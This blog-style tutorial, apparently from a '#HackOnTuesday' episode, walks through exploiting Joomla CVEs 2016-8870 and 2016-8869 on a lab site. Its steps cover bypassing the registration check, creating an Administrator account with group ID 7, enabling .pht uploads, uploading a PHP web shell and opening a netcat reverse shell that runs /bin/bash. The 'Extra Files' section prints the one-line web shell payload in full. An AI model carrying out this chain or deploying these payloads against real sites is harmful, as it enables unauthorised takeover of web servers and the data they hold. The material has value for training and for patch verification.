#HackOnTuesday Episode 3 Exploiting the Joomla Account Creation and Privilege Escalation Vulnerability

In the recent weeks, the entire security community has been shocked by two serious security vulnerabilities affecting all Joomla versions from 3.4.4 to 3.6.3: CVE-2016-8870 and CVE-2016-8869. Combining these vulnerabilities, an attacker can create a privileged user and potentially own the server hosting the Joomla website. In this episode, Gianni shows how to attack a Joomla site, upload a PHP shell, and get full access to the hosting server.

Tools, Scripts, and Exploits


1. Take a look at the changes/patch

» Go to Github page and click “releases”
» Click 2983d19 and scroll down to see the changes from the previous version
» Most of the changes happens in the components/com_users/controllers/user.php component
Enter your text here...

2. Analyze the “normal” registration process

» Enable “User Registration”
   • Login with the admin/password credentials
   • Go to System -> Global Configuration -> Users -> User Options and set “Allow User Registration” to “Yes”
» Create a user
   • Go to the vulnerable Joomla website
   • Click on “Author Login”
   • Click on “Don’t have an account?”
   • Enable the Burp Proxy
      - Run the run_burp.sh script and make sure the Proxy is on.
      - Set a proxy in Firefox
         - Go to Edit -> Preferences -> Advances -> Network -> Settings
         - Host: / Port: 8080
   • Complete the registration form and press “Register”
   • Analyze the HTTP Request
      - The “option” parameter is the name of the Joomla component in components/
      - The “task” parameter is the name of the controller and method to be called
      - In this case, registration.register calls the UserModelRegistration.register method
         - cd components/com_users/
         - ls -l
         - vim models/registration.php
      - The UserModelRegistration.register method performs few checks and if the registration is disabled, it redirects the user to the login page! See line 114 of the controllers/registration.php file.

3. Analyze the patch

» The patch removes the “register” method in the “UsersControllerUser” class. The register method does not check if a user is allowed to register new users and therefore an attacker can exploit this method to create a new user even if the “Allow User Registration” option is set to “No”! In particular:
» At line 301, the register method gets the form data.
   • $data = $this->input->post->get(‘user‘, array(), ‘array‘);
» At line 304, the register method gets the “UsersModelRegistration” model.
   • $model = $this->getModel(‘Registration’, ‘UsersModel’);
» At line 306, the register method gets the registration form.
   • $form = $model->getForm();
» At line 315, the form data is validated.
   • $return = $model->validate($form, $data);
» At line 346, the register method finalizes the registration using the register method of the “UsersModelRegistration” model.
   • $return = $model->register($data);

4. Bypass the registration checks by calling the “register” method of the “User” controller

» Switch off the “Allow User Registration” option.
» Get the index.php/author-login page and take note of the CSRF token
» Send an old HTTP request of the registration to the Burp Repeater
   • Change “jform” to “user”
   • Change “registration.register” to “user.register”
   • Change the CSRF token to the value of the hidden field in the login page.
   • Change the URL to /joomla/index.php?option=com_users&task=user.register
» Go back to the Admin console and look for the list of users.

5. Create a privileged user

» Go to Users -> User Groups and look for the ID of the Administrator group.
» Add a “user[groups][]” parameter in the request and use the default group ID of the Administrators group, 7.

6. Upload a PHP Shell

» Go to Content -> Media
» Click Options
» Add pht to “Legal Extensions (File Types)”
» Set “Restrict Uploads” and “Check MIME Types” to “No”
» Upload the shell.pht file

7. Get reverse shell

» Start a reverse shell listener in the attacker’s machine
   • nc -lvp 4444
» Connect back to the attacker machine
   • 4444 -e /bin/bash
» whoami
» Game Over!

Extra Files

<?= system($_GET['x']); ?>

java -jar -Xmx1024m burp.jar